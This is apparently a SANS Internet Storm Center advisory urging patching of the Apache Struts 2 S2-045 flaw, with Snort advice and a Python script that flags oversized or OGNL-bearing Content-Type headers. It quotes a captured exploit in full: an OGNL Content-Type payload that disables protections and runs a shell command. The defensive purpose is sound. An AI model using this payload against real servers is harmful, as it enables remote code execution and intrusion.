Critical Apache Struts 2 Vulnerability (Patch Now!), (Thu, Mar 9th)

On Monday, Apache released a patch for the Struts 2 framework [1]. The patch fixes an easy-to-exploit vulnerability in the multipart parser that is typically used for file uploads. A Metasploit module was released the same day, and some readers already reported seeing exploit attempts in the wild.

You should be running Struts 2.3.32 or 2.5.10.1. All prior versions are vulnerable.

Struts 2 is a Java framework that is commonly used by Java-based web applications. It is also known as Jakarta Struts and Apache Struts. The Apache project currently maintains Struts.

The vulnerability allows an attacker to include code (an OGNL expression) in the Content-Type header of an HTTP request. Here is a sample exploit attempt; the request line and the beginning of the headers are cut off in the captured copy, and the surviving fragment of that part reads "+http://www.baidu.com/search/spider.html":
Content-Type: %{(#nike=multipart/form-data).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=echo 587d7b356191903a8ff327f548766288).(#iswin=(@java.lang.System@getProperty(os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Referer: http://linux.cn/
Accept-Language: zh-cn
Content-Length: 0
Host: [removed]
Connection: Keep-Alive

Yes… the Content-Type header is quite long: about 800 bytes. It should be easy to catch these exploit attempts with Snort by just setting the max_header_length parameter in the http_inspect preprocessor. I haven't tried it yet, but setting this to 500 should work fine (the default is 750, which should work too).
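To make the detection idea concrete, here is an added example (not code from the diary or from the Snort project) that applies the same two checks a preprocessor would to raw HTTP request headers: an oversized Content-Type header, and, independently of length, the presence of an OGNL expression opener in that header. The requests it inspects are constructed inline; the boundary string, the host name and the placeholder expression are assumptions, not captured traffic, and the "OGNL" sample only carries the marker, not a working payload.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Mirrors the 500-byte limit suggested above for Snort's max_header_length.
# Legitimate multipart Content-Type headers (type plus boundary) stay well below it.
MAX_CONTENT_TYPE_LEN = 500

# OGNL expression openers. The captured sample above starts its Content-Type with "%{".
# Checking for the marker catches shortened payloads that a pure length threshold misses.
OGNL_MARKER = re.compile(r"%\{|\$\{")


@dataclass
class Finding:
    reason: str      # which check fired
    length: int      # length of the Content-Type value in bytes
    snippet: str     # first characters of the value, for the alert/log line


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return the headers of a raw HTTP request as a name -> value dict.

    Header names are lowercased, the request line is skipped, the body (if any)
    is ignored. Later duplicates of a header overwrite earlier ones.
    """
    head = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)[0]
    headers: Dict[str, str] = {}
    for line in head.splitlines()[1:]:          # [0] is the request line
        if ":" not in line:
            continue                             # tolerate junk lines
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def check_content_type(raw_request: str,
                       max_len: int = MAX_CONTENT_TYPE_LEN) -> Optional[Finding]:
    """Flag a request whose Content-Type header looks like an S2-045 attempt.

    The marker check runs first so that a short OGNL expression is still reported;
    the length check then catches anything oversized regardless of content.
    """
    ct = parse_headers(raw_request).get("content-type")
    if ct is None:
        return None
    if OGNL_MARKER.search(ct):
        return Finding("ognl-expression-in-content-type", len(ct), ct[:60])
    if len(ct) > max_len:
        return Finding("oversized-content-type", len(ct), ct[:60])
    return None


# Constructed sample requests (hypothetical host, boundary and placeholder expression).
BENIGN_REQUEST = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Same request with an absurdly long boundary: no marker, but over the 500-byte limit.
OVERSIZED_REQUEST = BENIGN_REQUEST.replace("----WebKitFormBoundary7MA4YWxkTrZu0gW", "A" * 600)

# Short header carrying only the OGNL opener; a length threshold alone would not catch it.
OGNL_REQUEST = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: %{(#x='multipart/form-data').(#placeholder='constructed marker only')}\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST),
                       ("oversized", OVERSIZED_REQUEST),
                       ("ognl", OGNL_REQUEST)):
        print(label, "->", check_content_type(req))
```

Running the block prints no finding for the benign upload, "oversized-content-type" for the long-boundary request and "ognl-expression-in-content-type" for the marker request. The same split between a length check and a content check is worth keeping in a Snort deployment: max_header_length gives a cheap, protocol-level alert, while a signature on the expression opener does not depend on how long the attacker's header happens to be.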

Snort.org included a rule in Tuesday's subscriber update.

[1] https://cwiki.apache.org/confluence/display/WW/S2-045


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.